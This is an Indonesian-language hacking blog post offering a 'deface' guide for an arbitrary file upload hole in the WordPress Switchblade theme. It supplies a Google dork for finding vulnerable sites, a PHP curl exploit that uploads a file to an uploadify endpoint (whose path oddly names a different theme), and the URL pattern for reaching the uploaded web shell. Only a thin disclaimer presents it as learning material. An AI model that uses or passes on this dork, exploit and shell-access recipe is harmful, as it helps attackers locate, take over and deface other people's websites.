Deface Dengan WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability. Langsung aja ya mbloo biar gak kelamaan jomvloo ^_^ .
.__.__ __ __
__ __ ____ |__| |__ _____ ____ | | __ _/ |_ ____ _____ _____
| | \/ \| | | \\__ \ _/ ___\| |/ / ______ \ __\/ __ \\__ \ / \
| | / | \ | Y \/ __ \\ \___| < /_____/ | | \ ___/ / __ \| Y Y \
|____/|___| /__|___| (____ /\___ >__|_ \ |__| \___ >____ /__|_| /
\/ \/ \/ \/ \/ \/ \/ \/ .Blogspot.comGoogle Dor ... dorr... dorrrk : inurl:/wp-content/themes/switchblade
Exploit jeung POC :
<?php
$uploadfile="up.php";
$ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://joomvlo.com/[path]]/wp-content/uploads/[tahon]/[bolan]/shell.php
Udah gitu aja, kalo gak ngerti tanya aja ke fb ane link : www.fb.com/Aria.phtml
Notes : Semua kerusakan yang terjadi bukanlah tanggung jawab penulis, karena penulis hanya memberi pembelajaran yang bukan untuk disalah gunakan !
Posting Komentar Blogger Facebook
Catatan :
1. Untuk menyisipkan kode gunakan <i rel="code">kode yang akan disisipkan</i>
2. Untuk menyisipkan kode panjang gunakan <i rel="pre">kode yang akan disisipkan</i>
3. Untuk menyisipkan quote gunakan <b rel="quote">catatan anda</b>
4. Untuk menyisipkan gambar gunakan <i rel="image">URL gambar</i>
5. Untuk menyisipkan video gunakan <i rel="youtube">URL Video youtube</i>
Keterangan :
Gunakan HTML konverter sebelum menyisipkan kode.
Contoh link image : http://blablabla.com/image.jpg.
Profile yang mengandung broken link akan dihapus tanpa pemberitahuna terlebih dahulu.